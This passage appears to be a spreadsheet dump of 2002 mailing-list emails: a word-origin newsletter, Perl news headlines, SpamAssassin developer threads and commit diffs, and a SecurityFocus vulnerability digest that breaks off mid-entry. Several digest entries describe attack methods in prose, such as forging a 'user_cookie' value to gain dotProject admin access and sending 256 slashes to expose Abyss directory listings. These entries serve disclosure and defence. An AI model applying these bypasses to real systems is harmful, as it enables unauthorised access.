from languages around the world). In this case the source may be
"mokardi" or "mokodo", something tainted (these Romany words also
provide the root for yet another slang phrase, "to put the mockers
on something", to jinx it).Sorry not to be able to be more definite!                        -----------Q. I was having an interesting discussion with an American
professor of business studies who also consults to industry. She
was recalling an unbudgeted initiative within a major software
corporate, which the UK managing director described as a "skunk
project". I have seen this epithet before, usually in the phrase
"skunk works", meaning a semi-official project team that is tacitly
licensed to bend the rules and think outside the box. I wonder what
the derivation is? I don't think it can refer to the smelly wild
animal, but neither I think can it refer to the street term for a
strong variant of marijuana. Can you shed any light? [Martin
Hayman]A. We must start in Dogpatch, the fictional place in the backwoods
of upper New York State made famous between 1934 and 1977 as the
home of professional mattress tester Li'l Abner, in the comic strip
written and drawn by Al Capp. The original was actually "Skonk
Works", the place where Lonesome Polecat and Hairless Joe brewed
their highly illicit bootleg Kickapoo Joy Juice from ingredients
such as old shoes and dead skunks. ("Skonk" is a dialect variant of
"skunk".)We must now move to the very real Burbank, California. In 1943, a
small group of aeronautical engineers working for the then Lockheed
Aircraft Corporation (headed by Clarence "Kelly" Johnson) were
given the rush job of creating an entirely new plane from scratch,
the P-80 "Shooting Star" jet fighter. This they did in 143 days, 37
days ahead of schedule. Their secret project was housed in a
temporary structure roofed over with an old circus tent, which had
been thrown up next to a smelly plastics factory. The story goes
that one of the engineers answered the phone on a hot summer day
with the phrase "Skonk Works here" and the name stuck. It is also
said that Al Capp objected to their use of his term and it was
changed to Skunk Works.One division of the company, formally the Lockheed Martin Advanced
Development Program, is still known as the Skunk Works. The term
has been trademarked by Lockheed Martin, who have been aggressive
in protecting it.As a generic term, it dates from the 1960s. One definition is very
much that of the original and the one you describe: a small group
of experts who drop out of the mainstream of a company's operations
in order to develop some experimental technology or new application
in secrecy or at speed, unhampered by bureaucracy or the strict
application of regulations (Kelly Johnson formulated 14 visionary
rules for running such an operation, which are still regarded as
valid even now). It is also sometimes used for a similar group that
operates semi-illicitly, without top-level official knowledge or
support, though usually with the tacit approval of immediate
management.
5. Endnote
-------------------------------------------------------------------
The principal design of a grammar of any language is to teach us to
express ourselves with propriety in that language; and to enable us
to judge of every phrase and form of construction, whether it be
right or not. [Robert Lowth, "A Short Introduction to English
Grammar" (1762)]
6. Subscription commands
-------------------------------------------------------------------
To leave the list, change your subscription address, or subscribe,
please visit .Or, you can send a message to 
from the address at which you are (or want to be) subscribed:  To leave, send: SIGNOFF WORLDWIDEWORDS
  To join, send: SUBSCRIBE WORLDWIDEWORDS First-name Last-name
7. Contact addresses
-------------------------------------------------------------------
Do not use the address that comes up when you hit 'Reply' on this
mailing, or your message will be sent to an electronic dead-letter
office. Either create a new message, or change the outgoing 'To:'
address to one of these:  For general comments, especially responses to Q&amp;A pieces:
      .
  For questions intended for reply in a future Q&amp;A feature:
      .-------------------------------------------------------------------
World Wide Words is copyright (c) Michael Quinion 2002.  All rights
reserved. The Words Web site is at .
-------------------------------------------------------------------
You may reproduce this newsletter in whole or in part in other free
media online provided that you include this note and the copyright
notice above. Reproduction in print media or on Web pages requires
prior permission: contact .
-------------------------------------------------------------------</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerApress Publishes 'Writing Perl Modules for CPAN'
    posted by pudge on Tuesday August 13, @09:50 (books)
    http://use.perl.org/article.pl?sid=02/08/13/1354231Lessig's 'Freeing Culture' Keynote Online
    posted by KM on Tuesday August 13, @11:27 (links)
    http://use.perl.org/article.pl?sid=02/08/13/1527257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</si>
  <si>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Apress Publishes 'Writing Perl Modules for CPAN'
    * Lessig's 'Freeing Culture' Keynote Online+--------------------------------------------------------------------+
| Apress Publishes 'Writing Perl Modules for CPAN'                   |
|   posted by pudge on Tuesday August 13, @09:50 (books)             |
|   http://use.perl.org/article.pl?sid=02/08/13/1354231              |
+--------------------------------------------------------------------+[0]samtregar writes "My new book, [1]Writing Perl Modules for CPAN, is
now available. If you ever wanted to learn to write modules and release
them on CPAN, now is the time. For experienced module makers, the book
offers advanced training in XS, Inline::C and CGI::Application. You can
[2]read the first chapter online for free. The book is shipping now from
[3]Amazon, [4]BN and others."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/13/1354231Links:
    0. mailto:sam@tregar.com
    1. http://apress.com/book/bookDisplay.html?bID=14
    2. http://apress.com/book/supplementDownload.html?bID=14&amp;sID=617
    3. http://www.amazon.com/exec/obidos/ASIN/159059018X
    4. http://search.barnesandnoble.com/bookSearch/isbnInquiry.asp?isbn=159059018X&amp;pdf=Y
+--------------------------------------------------------------------+
| Lessig's 'Freeing Culture' Keynote Online                          |
|   posted by KM on Tuesday August 13, @11:27 (links)                |
|   http://use.perl.org/article.pl?sid=02/08/13/1527257              |
+--------------------------------------------------------------------+[0]Ask writes "Leonard Lin put up [1]Lawrence Lessig's Freeing Culture
keynote from OSCON. It's excellent. It's great. It's the slides with
audio in flash. So download that flash player already and click the url.
I also [2]mirrored it at perl.org. You still here? See it already, you
*will* be entertained. Near the end of the keynote Lessig asked how many
had donated to the EFF. Many hands went up. We felt great. 'Yeah, we're
helping!' Then he asked how many had donated more than they spend on
their broadband connection... I don't think I was alone in feeling a bit
busted. :-)"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/13/1527257Links:
    0. http://www.askbjoernhansen.com/
    1. http://randomfoo.net/oscon/2002/lessig/
    2. http://www.perl.org/tpc/2002/lessig/Copyright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</si>
  <si>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/etc/rc.d/init.d/httpd: kill: (21982) - No such pid
/etc/rc.d/init.d/httpd: kill: (21981) - No such pid
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerSpouses afternoon at YAPC::Europe
    posted by ziggy on Wednesday August 14, @19:44 (news)
    http://use.perl.org/article.pl?sid=02/08/14/2351255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</si>
  <si>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Spouses afternoon at YAPC::Europe+--------------------------------------------------------------------+
| Spouses afternoon at YAPC::Europe                                  |
|   posted by ziggy on Wednesday August 14, @19:44 (news)            |
|   http://use.perl.org/article.pl?sid=02/08/14/2351255              |
+--------------------------------------------------------------------+[0]Richard Foley writes "On Thursday, September 19th, we are running an
easy walking tour around the city of Munich, for all those long-suffering
partners coming to YAPC::Europe, as a sort of treat for putting up with
the other half going to this very interesting event. Just to be clear:
we're not after any conference participant/attendees on this, only those
who are waiting until all the perl talk has finished (perl-widows and the
like). We'd like to have an idea of numbers, please, ahead of time, so:
[1]RSVP. Thanks!"Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/08/14/2351255Links:
    0. http://www.yapc.org/Europe/
    1. mailto:Richard.Foley@t-online.deCopyright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</si>
  <si>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Problem with spamtrap
Could not lock /home/yyyy/lib/spamtrap/spam.mbox: File exists at lib/Mail/SpamAssassin/NoMailAudit.pm line 484,  line 207.</t>
  </si>
  <si>
    <t>On Tue, 20 Aug 2002 11:14:50 -0700, Craig R.Hughes  writes:&gt; On Tuesday, August 20, 2002, at 07:23  AM, Justin Mason wrote:
&gt; 
`&gt; Remember that the GA is going to be considering combinatorial uses of
&gt; the rules, so rules which look dodgy on their own might be gems for
&gt; the GA -- perhaps something with a S/O ratio of .5 actually occurs
&gt; often in combination with some other rule, and in those situations,
&gt; helps to distinguish spam vs nonspam.
&gt; We're currently using a perceptron classifier. It *can't* learn
combinations of rules.[1]I gave an example, assume 4 rules:
   SPAM = (A or B) and (C or D)It cannot learn that function.A decision tree classifier *can* learn that example, and the function
above, where a .5 S/O rule is only important in certain
circumstances. (Then again, it may be smartest to hardcode a meta-rule
for that case, rather than trust to a naive DT learner.)Scott
[1] To be fair, nor can a Bayes classifier.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</si>
  <si>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I've been lurking the SA lists since I installed SA on a production
machine a while back. While SA did a surprisingly accurate job on
detecting English language spam, it did not succeed very well on German
language spam, which I keep getting increasing amounts of lately. I've
got a lousy results with out of the box scores, very few spam is acually
cought.What is the strategy with respect to foreign language spam recognition
in SA? I've seen extremely few non-english rules. Is there foreign
language rule development going on? Has anybody done work on German
spam?In any case, I've started spam/nonspam corpi consisting of only German
(and Swiss-German, respectively) messages, to be able to help with
German rules. Anybody willing to contribute to the corpus feel free to
resend/bounce German spam in a sane way to spam@roe.ch . I cannot be
bothered to subscribe to SAsightings just for the odd German spam every
hundred++ messages.. how about a list for foreign language spam
sightings?Has anybody done this before or am I on the edge of duplicating effort
here?I've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list.Is there any development or are there plans along those lines? Are there
other people willing to contribute to effective spam filtering rules in
German language?Any kind of feedback is welcome, even flames ;)Cheers,
Dan
-- 
   Daniel Roethlisberger 
   OpenPGP key id 0x804A06B1 (1024/4096 DSA/ElGamal)
   144D 6A5E 0C88 E5D7 0775 FCFD 3974 0E98 804A 06B1
   &gt;&gt; privacy through technology, not legislation &lt;&lt;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</si>
  <si>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hope you all don't mind me creating a new thread and adding a Cc: to
spamassassin-devel.  I want to make sure everyone reads Craig's email.
(I don't really have any comments other than to endorse it and suggest
creating a branch ASAP.)Craig R.Hughes  writes:&gt; Ok folks...  I think there's been some confusion, so I recommend 
&gt; the following:
&gt; 
&gt; 1. Use the CVS tag spamassassin_pre_2_4_0 which I just created 
&gt; to generate your mass-checks
&gt; 2. Submit the results via rsync in the usual way ASAP
&gt; 3. Justin and I will cooperate on running the GA sometime around 
&gt; midnight PST (GMT-0800) on thursday/friday
&gt; 
&gt; Any good data that's in the rsync corpus by that time will be 
&gt; used to feed the GA.  That will give everyone about 48 hours 
&gt; from now to generate the logs and submit them, plus it'll give 
&gt; Justin and me about 48 hours to tinker with the GA (and 
&gt; hopefully get it compiling again on my machine grumble 
&gt; grumble).  That should then yield a 2.40 release sometime on 
&gt; friday, possibly saturday if we need to do multiple GA runs to 
&gt; tweak things properly.
&gt; 
&gt; C
&gt; 
&gt; PS Volunteering Justin here, since I suspect he's probably fast 
&gt; asleep right now.</t>
  </si>
  <si>
    <t>Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
In directory usw-pr-cvs1:/tmp/cvs-serv13785Modified Files:
      Tag: b2_4_0
	Conf.pm 
Log Message:
restricted version_tagIndex: Conf.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
retrieving revision 1.91.2.1
retrieving revision 1.91.2.2
diff -b -w -u -d -r1.91.2.1 -r1.91.2.2
--- Conf.pm	21 Aug 2002 16:02:13 -0000	1.91.2.1
+++ Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2
@@ -263,6 +263,7 @@
     if(/^version[-_]tag\s+(.*)$/) {
       my $tag = lc($1);
+      $tag =~ tr/a-z0-9./_/c;
       foreach (@Mail::SpamAssassin::EXTRA_VERSION) {
         if($_ eq $tag) {
           $tag = undef;-------------------------------------------------------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</si>
  <si>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/cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
In directory usw-pr-cvs1:/tmp/cvs-serv13563/lib/Mail/SpamAssassinModified Files:
	Conf.pm 
Log Message:
restricted version_tagIndex: Conf.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
retrieving revision 1.92
retrieving revision 1.93
diff -b -w -u -d -r1.92 -r1.93
--- Conf.pm	21 Aug 2002 16:01:08 -0000	1.92
+++ Conf.pm	21 Aug 2002 16:27:06 -0000	1.93
@@ -263,6 +263,7 @@
     if(/^version[-_]tag\s+(.*)$/) {
       my $tag = lc($1);
+      $tag =~ tr/a-z0-9./_/c;
       foreach (@Mail::SpamAssassin::EXTRA_VERSION) {
         if($_ eq $tag) {
           $tag = undef;-------------------------------------------------------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</si>
  <si>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/cvsroot/spamassassin/spamassassin/wordfreqs
In directory usw-pr-cvs1:/tmp/cvs-serv17442/wordfreqsModified Files:
      Tag: b2_4_0
	RUNME 
Log Message:
added a warning for ISPs in required_hits manual entryIndex: RUNME
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/wordfreqs/RUNME,v
retrieving revision 1.1
retrieving revision 1.1.4.1
diff -b -w -u -d -r1.1 -r1.1.4.1
--- RUNME	15 Jan 2002 05:34:18 -0000	1.1
+++ RUNME	21 Aug 2002 16:32:55 -0000	1.1.4.1
@@ -13,17 +13,20 @@
 mv spam.local nonspam.local logs/old
-./mass-phrase-freq /local2/mail-archives/scoop.1999.gz &gt;&gt; nonspam.local
-./mass-phrase-freq /local2/mail-archives/oldmail.1998.gz &gt;&gt; nonspam.local
-
 ./mass-phrase-freq-for-jm ; sh commands.sh
-for f in /local2/mail-archives/crackmice-old/* ; do
-  ./mass-phrase-freq $f &gt;&gt; nonspam.local
+for f in /local/mail-archives/recent/nonspam/* ; do
+  echo Checking $f: ; ./mass-phrase-freq $f  &gt;&gt; nonspam.local
 done
-./mass-phrase-freq /local2/mail-archives/kelsey.spamtrap.gz &gt;&gt; spam.local
-./mass-phrase-freq /local2/mail-archives/spam.2000-2001.gz &gt;&gt; spam.local
+./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/nonspam.mbox &gt;&gt; nonspam.local
+
+./mass-phrase-freq /local/mail-archives/recent/spamtrap/20020717/mbox &gt;&gt; spam.local
+
+for f in /local/mail-archives/old/nonspam/* /local/mail-archives/recent/nonspam/*
+do
+  echo Checking $f: ; ./mass-phrase-freq $f &gt;&gt; nonspam.local
+done
 echo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</si>
  <si>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/cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
In directory usw-pr-cvs1:/tmp/cvs-serv17442/lib/Mail/SpamAssassinModified Files:
      Tag: b2_4_0
	Conf.pm 
Log Message:
added a warning for ISPs in required_hits manual entryIndex: Conf.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
retrieving revision 1.91.2.2
retrieving revision 1.91.2.3
diff -b -w -u -d -r1.91.2.2 -r1.91.2.3
--- Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2
+++ Conf.pm	21 Aug 2002 16:32:55 -0000	1.91.2.3
@@ -396,7 +396,11 @@
 =item required_hits n.nn   (default: 5)
 Set the number of hits required before a mail is considered spam.  C can
-be an integer or a real number.
+be an integer or a real number.  5.0 is the default setting, and is quite
+aggressive; it would be suitable for a single-user setup, but if you're an ISP
+installing SpamAssassin, you should probably set the default to be something
+much more conservative, like 8.0 or 10.0.  Experience has shown that you
+B get plenty of user complaints otherwise!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</si>
  <si>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Yes, it is very impressive.  However, all of the most advanced content
filtering known to man is easily defeated by simply presenting the content
in the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more
spammers don't already do this.  I know we have discussed this before, and
maybe we can detect this type of spam via the headers and with Razor/DCC (if
you're using them).  But that sure narrows down the ruleset (maybe that's
good).MTodd
-----Original Message-----
From: yyyy@spamassassin.taint.org [mailto:yyyy@spamassassin.taint.org]
Sent: Friday, August 16, 2002 12:52 PM
To: SpamAssassin-talk@example.sourceforge.net
Subject: [SAtalk] paulgraham.com article
Quite interesting -- it's pretty similar to the spam phrases stuff.  As
Scott pointed out, this would work quite well as a naive Bayesian system.
(in fact, I think it may be quite close to being one already...)I like the way "FL" -- ie. Florida -- is one of the top scoring terms. ;)Also, when I was doing the spam-phrases stuff, I discounted the ff0000
thing, as HTML garbage! never realised it corresponded to "bright red" :(
Have we got a test for that?--j.--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</si>
  <si>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Hess, Mtodd, /mth wrote:
&gt; Yes, it is very impressive.  However, all of the most advanced content
&gt; filtering known to man is easily defeated by simply presenting the content
&gt; in the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more
&gt; spammers don't already do this.  I know we have discussed this before, and
&gt; maybe we can detect this type of spam via the headers and with Razor/DCC (if
&gt; you're using them).  But that sure narrows down the ruleset (maybe that's
&gt; good).Doesn't defeat this system at all. If you see that once, feed it into 
your bayesian classifier, and it classifies the URLs used for the 
images. Then next time it sees one, it knows with almost 100% accuracy 
that an email with one of those URLs is definitely spam.In many ways this is like Razor, which is why I'm hacking on a 
distributed system to do this, to see if it's feasible to scale it globally.Matt.-------------------------------------------------------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</si>
  <si>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Aug 21, 2002 at 11:26:13AM -0500, brad angelcyk wrote:
&gt; 
&gt; 
&gt; Hi,
&gt; 
&gt; I have been using SpamAssassin for a few weeks, and I have noticed that
&gt; the speed of scanning of email has drastically reduced since we switched
&gt; to it.  My configuration is Sendmail 8.12.3 with SA 2.31 (using the
&gt; spamass-milter sendmail milter).  There are 125 spamc processes running
&gt; right now, and there were about 109 an hour ago.  They don't seem to be
&gt; clearing up.  Does anybody have any information on what I can do?
&gt; 
&gt; Thanks,
&gt; Brad
&gt; 
the check_local tarball includes a program called miltrassassin.
It's a C Milter program speaking the SPAMD protocol so it will be
far more efficient than spamass-milter.
Check http://www.digitalanswers.org/check_local/miltrassassin.html
for some details about miltrassassin.                                                                                                                                                                     
The check_local tarball can be downloaded on
http://www.digitalanswers.org/check_local/beta.htmlAnother alternative solution is to use Mimedefang : it offers
anti-spam, attachment defanging, custom filtering.regards, SL/---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</si>
  <si>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11:34 AM -0400 8/21/02, Theo Van Dinter wrote:
&gt;On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote:
&gt;&gt;  Omaha Steaks *is* spam.  I bought something from them once. 
&gt;&gt;*Great* steaks, but
&gt;&gt;  then they started calling me, emailing me, snail-mailing, 
&gt;&gt;constantly.  I once
&gt;
&gt;If you sign up for something, it's not spam by definition, aggressive as
&gt;they may be.  (I told them to stop calling me, and they stopped, so ...)I call it spam if I ask to be removed from the spamming list though. 
I occasionally buy X-10 stuff.  I've learned from past experiences to 
create a quick mail alias to get order confs and what not.  Then can 
it once the order is complete because those spamming SOBs will not 
stop filling my inbox with 3-6 ads per day.  I've LARTed them and 
their upstream numerous times asking to be list washed.  I don't even 
get an auto-ack.  I started a procmail recipe to reject mail to them 
and include a form letter (I was planning on later appending every 
piece of x-10 spam I've archived to the form letter for their reading 
pleasure...) but I haven't gotten it to work.  Bottom line, if I gave 
them permission to mail me (explicitly or via privacy policy), it's 
not spam but once I told them to stop mailing me then it's spam.My $.02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</si>
  <si>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3:39 PM -0500 8/21/02, Rice, MA Mark (6750 wrote:
&gt;I get hit with these probes or "Rumplestiltskin attacks" too.
&gt;Justin, could you explain what a "LART" is?  I've seen that term used on
&gt;this list before...Sure.  I described it the way I understand it to another person off 
list a little while ago.
It has a couple different definitions.  The most common is Luser 
[sic] Attitude Readjustment Tool.  It was first used to describe the 
reporting of spam to ISPs that didn't think spam was bad.  Their 
attitude needed a little readjusting.  It has since taken on the 
generic meaning of reporting email/security incidents to the 
appropriate parties.  Somewhere the definition is online.  I can't 
seem to find the page though.
LART is about as good a word as any to describe reporting 
Rumplestiltskin attacks.  Come to think of it, I generally get a much 
better response to spam LARTs than I do to LARTs for other things. 
I'm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:)Justin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</si>
  <si>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
SecurityFocus Linux Newsletter #92
----------------------------------This newsletter is sponsored by: SecurityFocus DeepSight Threat Management
System&gt;&gt;From June 24th - August 31st, 2002, SecurityFocus announces a FREE
two-week trial of the DeepSight Threat Management System: the only early
warning system providing customizable and comprehensive early warning of
cyber attacks and bulletproof countermeasures to prevent attacks before
they hit your network.With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it.Sign up today!
http://www.securityfocus.com/corporate/products/promo/tmstrial-lx.shtml
-------------------------------------------------------------------------------I. FRONT AND CENTER
     1. Advanced Log Processing
     2. Assessing Internet Security Risk, Part Three: an Internet...
     3. Copyright, Security, and the Hollywood Hacking Bill
     4. SecurityFocus DPP Program
II. LINUX VULNERABILITY SUMMARY
     1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow...
     2. Abyss Web Server HTTP GET Request Directory Contents Disclosure...
     3. DotProject User Cookie Authentication Bypass Vulnerability
     4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
     5. phpBB2 Gender Mod Remote SQL Injection Vulnerability
     6. ShoutBox Form Field HTML Injection Vulnerability
     7. Sympoll File Disclosure Vulnerability
     8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
     9. William Deich Super SysLog Format String Vulnerability
     10. Frederic Tyndiuk Eupload Plain Text Password Storage...
     11. Util-linux File Locking Race Condition Vulnerability
     12. OpenSSL Kerberos Enabled SSLv3 Master Key Exchange Buffer...
     13. OpenSSL ASCII Representation Of Integers Buffer Overflow...
     14. ParaChat Phantom User Denial Of Service Vulnerability
     15. OpenSSH Trojan Horse Vulnerability
     16. Bharat Mediratta Gallery Remote File Include Vulnerability
     17. John G. Myers MUnpack Malformed MIME Encoded Message Buffer...
     18. Dispair Remote Command Execution Vulnerability
     19. Mailreader Session Hijacking Vulnerability
     20. John G. Myers MPack/MUnpack Malformed Filename Vulnerability
     21. Fake Identd Client Query Remote Buffer Overflow Vulnerability
III. LINUX FOCUS LIST SUMMARY
     1. LDAP Auth? (Thread)
     2. LDAP auth (Thread)
     3. Administrivia: Gone Fishin' (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Gateway Guardian
     2. PakSecured Linux
     3. Progressive Systems VPN
V. NEW TOOLS FOR LINUX PLATFORMS
     1. Astaro Security Linux (Stable 3.x) v3.202
     2. FCheck 2.07.59
     3. The @stake Sleuth Kit (TASK) v1.50
VI. SPONSORSHIP INFORMATION
I. FRONT AND CENTER
-------------------
1. Advanced Log Processing
By Anton ChuvakinReading logs is a crucial part of incident detection and response.
However, it is easy for security personnel to be overwhelmed by the sheer
volume of logs. This article will offer a brief overview of log analysis,
particularly: log transmission, log collection and log analysis. It will
also briefly touch upon log storing and archival.http://online.securityfocus.com/infocus/16132.  Assessing Internet Security Risk, Part Three: an Internet Assessment
Methodology Continued
by Charl van der WaltThis article is the third in a series that is designed to help readers to
assess the risk that their Internet-connected systems are exposed to. In
the first installment, we established the reasons for doing a technical
risk assessment. In the second part, we started to discuss the methodology
that we follow in performing this kind of assessment. In this installment,
we will continue to discuss methodology, particularly visibility and
vulnerability scanning.http://online.securityfocus.com/infocus/16123. Copyright, Security, and the Hollywood Hacking Bill
By Richard FornoProposed copyright enforcement legislation may allow the powerful
entertainment lobby to circumvent fundamental constitutional protections,
and may create chaos on the Internet.http://online.securityfocus.com/columnists/994. SecurityFocus DPP ProgramAttention Non-profit Organizations and Universities!!
Sign-up now for preferred pricing on the only global early-warning system
for cyber attacks - SecurityFocus DeepSight Threat Management System.Click here for more information:
http://www.securityfocus.com/corporate/products/dpsection.shtml
II. BUGTRAQ SUMMARY
-------------------
1. OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability
BugTraq ID: 5363
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5363
Summary:OpenSSL is an open source implementation of the SSL protocol. It is used
by a number of other projects, including but not restricted to Apache,
Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
systems.A buffer overflow vulnerability has been reported in some versions of
OpenSSL.When initiating an OpenSSL session, some information is shared between the
client and the server, including key data. The reported vulnerability lies
in the handling of the client key value during the negotiation of the
SSLv2 protocol.A malicious client may exploit this vulnerability by transmitting a
malformed key to the vulnerable server. Careful exploitation may result in
execution of arbitrary code as the server process, and the attacker
gaining local access to the vulnerable system. More primitive attacks may
result in the server process crashing, possibly producing a denial of
service condition.The consequences of exploitation may vary with the nature of the
application using OpenSSL.Oracle reports that CorporateTime Outlook Connector is only vulnerable
under Microsoft Windows 98, NT, 2K, and XP.** This vulnerability was originally part of BID 5353, Multiple OpenSSL
Buffer Overflow Vulnerabilities. It has now been reissued as a separate
vulnerability.2. Abyss Web Server HTTP GET Request Directory Contents Disclosure Vulnerability
BugTraq ID: 5345
Remote: Yes
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5345
Summary:Abyss Web Server is a freely available personal web server. It is
maintained by Aprelium Technologies and runs on Microsoft Windows
operating systems, as well as Linux.A vulnerability has been reported for Abyss Web Server 1.0.3 running on a
Microsoft Windows platform. It is possible for an attacker to make a
request such that the contents of the specified directory are revealed.The vulnerability occurs due to the manner in which excessive '/'
characters are handled in web requests. An attacker making a GET request
followed by 256 '/' characters will cause Abyss Web Server to return an
error page containing the directory listing of the specified directory.An attacker may be able to use this information to launch further,
potentially damaging attacks, against a vulnerable system.3. DotProject User Cookie Authentication Bypass Vulnerability
BugTraq ID: 5347
Remote: Yes
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5347
Summary:dotproject is web-based project management software, written in PHP.  It
is designed to run on Unix and Linux variants.dotproject is prone to an issue which may allow remote attackers to bypass
authentication and gain administrative access to the software.This may be accomplished by submitting a maliciously crafted 'user_cookie'
value either manually or via manipulation of URI parameters.  For example,
the attacker may manually craft a cookie with a 'user_cookie' value of 1
and submit it to the project management system.  An attacker may also
submit a malicious web request with the 'user_cookie' URI parameter set to
1.  In both instances, the attacker will gain administrative access to the
project management system.This problem is due to the software relying on the 'user_cookie' value to
authenticate the user.4. OpenSSL SSLv3 Session ID Buffer Overflow Vulnerability
BugTraq ID: 5362
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5362
Summary:OpenSSL is an open source implementation of the SSL protocol. It is used
by a number of other projects, including but not restricted to Apache,
Sendmail, Bind, etc.. It is commonly found on Linux and Unix based
systems.A vulnerability has been reported for OpenSSL. The vulnerability affects
SSLv3 session IDs.When initiating contact with SSLv3 servers, clients and servers alike
exchange information. Session information is stored in a session key with
a unique session ID.Reportedly when a an oversized SSL version 3 session ID is supplied to a
client from a malicious server, it is possible to overflow a buffer on the
remote system. This could result in key memory areas on the vulnerable,
remote system being overwritten, including stack frame data.An attacker may be able to take advantage of this vulnerability to execute
malicious code on a vulnerable SSLv3 client machine.Oracle reports that CorporateTime Outlook Connector is only vulnerable
under Microsoft Windows 98, NT, 2K, and XP.** This vulnerability was originally part of BID 5353, Multiple OpenSSL
Buffer Overflow Vulnerabilities. It has now been reissued as a separate
vulnerability.5. phpBB2 Gender Mod Remote SQL Injection Vulnerability
BugTraq ID: 5342
Remote: Yes
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5342
Summary:phpBB2 is an open-source web forum application that is written in PHP and
backended by a number of database products. It will run on most Unix and
Linux variants, as well as Microsoft Windows operating systems.Gender Mod is a modification for phpBB2 which allows the association of a
gender with a given user profile. A SQL injection vulnerability has been
reported in this mod.A malicious user may modify the specified value for 'gender' when updating
their profile. It is possible to include additional SQL statements in this
string, and subvert the SQL statement used to update the user profile.It has been reported possible to gain administrative access to the phpBB2
site through exploitation of this issue. Other attacks may be possible,
including the ability to view sensitive database information or to modify
additional information stored in the database.6. ShoutBox Form Field HTML Injection Vulnerability
BugTraq ID: 5354
Remote: Yes
Date Published: Jul 29 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5354
Summary:shoutBOX is web-based user feedback software.  It is written in PHP and
runs on Unix and Linux variants as well as Microsoft Windows operating
systems.ShoutBox does not sufficiently sanitize HTML tags from input supplied via
form fields.  In particular, the user website URL field of the feedback
form is not sanitized of HTML tags.Attackers may exploit this lack of input validation to inject arbitrary
HTML and script code into pages that are generated by the script.  This
may result in execution of attacker-supplied code in the web client of a
user who visits such a page.  HTML and script code will be executed in the
security context of the site hosting the software.This condition may be exploited to hijack web content or potentially steal
cookie-based authentication credentials.7. Sympoll File Disclosure Vulnerability
BugTraq ID: 5360
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5360
Summary:Sympoll is web-based voting booth software.  It is implemented in PHP and
will run on most Unix and Linux variants as well as Microsoft Windows
operating systems.Sympoll is prone to an issue which may allow remote attackers to disclose
the contents of arbitrary webserver readable files.  This vulnerability is
only present on hosts which are running the vulnerable version of the
software and have the PHP 'register_globals' directive enabled.  The
source of this vulnerability is reported to be insufficient integrity
checking of variables.The vendor has stated that this issue is only believed to affect Sympoll
version 1.2.Exploitation of this issue on Microsoft Windows operating systems may
potentially expose arbitrary system files since webservers typically run
in the SYSTEM context.8. OpenSSL ASN.1 Parsing Error Denial Of Service Vulnerability
BugTraq ID: 5366
Remote: Yes
Date Published: Jul 30 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5366
Summary:OpenSSL is an open source implementation of the SSL protocol.  It is used
by a number of other projects, including but not restricted to Apache,
Sendmail, Bind, etc..  It is commonly found on Linux and Unix based
systems.A remotely exploitable denial of service condition has been reported in
the OpenSSL ASN.1 library.This vulnerability is due to parsing errors and affects SSL, TLS, S/MIME,
PKCS#7 and certificate creation routines.  In particular, malformed
certificate encodings could cause a denial of service to server and client
implementations which depend on OpenSSL.Oracle reports that CorporateTime Outlook Connector is only vulnerable
under Microsoft Windows 98, NT, 2K, and XP.** This vulnerability was originally part of BID 5353, Multiple OpenSSL
Buffer Overflow Vulnerabilities. It has now been reissued as a separate
vulnerability.9. William Deich Super SysLog Format String Vulnerability
BugTraq ID: 5367
Remote: No
Date Published: Jul 31 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5367
Summary:super is an open source set-uid root utility that allows for a similar
functionality to that of the sudo utility. It is written for use on Linux
and Unix variant operating systems.super is prone to a format string vulnerability. This problem is due to
incorrect use of the syslog() function to log error messages. It is
possible to corrupt memory by passing format strings through the
vulnerable logging function. This may potentially be exploited to
overwrite arbitrary locations in memory with attacker-specified values.The vulnerability is a result of compiling super with syslog support. Due
to an error in the file, error.c, users that are not in the super
configuration file will still be able to execute code with root
privileges.Successful exploitation of this issue may allow the attacker to execute
arbitrary instructions with root privileges.10. Frederic Tyndiuk Eupload Plain Text Password Storage Vulnerability
BugTraq ID: 5369
Remote: Yes
Date Published: Jul 31 2002 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/5369
Summary:Frederic Tyndiuk Eupload is a small script designed to facilitate
uploading of files to a remote server. It is written in Perl and should
work with Microsoft Windows and Linux and Unix variant operating systems.A problem with Eupload 1.0 may make it possible for remote attackers to
gain access to sensitive information.Eupload does not cryptographically protect stored passwords. Passwords
